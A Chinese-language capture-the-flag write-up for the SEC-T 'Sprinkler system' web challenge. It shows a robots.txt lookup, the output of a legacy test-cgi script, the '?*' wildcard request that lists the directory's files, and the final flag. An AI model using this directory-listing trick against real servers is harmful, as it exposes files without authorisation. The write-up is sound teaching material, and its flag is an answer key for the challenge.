[SEC-T CTF] - Sprinkler system (Web 100)

發表於 | 分類於 |

題目資訊

Damn new york… some chick tricked you into standing in the rain on the very first day… it’s payback time!

Service: http://sprinklers.alieni.se/

Author: avlidienbrunn

解法

直接試了 robots.txt 得到:

1
2
User-agent: *
Disallow: /cgi-bin/test-cgi

連上 http://sprinklers.alieni.se/cgi-bin/test-cgi 會拿到以下資訊:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
PATH_INFO = 
PATH_TRANSLATED = 
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST =
REMOTE_ADDR = x.x.x.x
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

查了一下 test-cgi vulnerability ,找到其有 directory listings 的問題(參考:這篇)。在網址 query 加上*可以在QUERY_STRING看到目前資料夾路徑下的所有檔案與資料夾名稱。

http://sprinklers.alieni.se/cgi-bin/test-cgi?*

1
QUERY_STRING = enable_sprinkler_system test-cgi

連上 http://sprinklers.alieni.se/cgi-bin/enable_sprinkler_system 即可拿到 flag 。

Flag: SECT{-p00l_On_t3h_r00f_must_h@v3_A_l3ak!-}